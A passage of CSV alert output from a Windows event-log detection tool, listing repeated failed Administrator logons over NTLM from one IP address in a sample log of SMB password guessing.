192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.313 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.362 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.406 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.460 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.509 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.609 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.706 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.967 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:10.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.042 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.361 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.414 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.608 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.650 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:11.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:11.967 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.061 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.115 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.235 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.361 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.477 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.641 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.882 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.917 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.960 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.042 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.090 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.250 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.393 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.478 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.568 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.616 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.689 
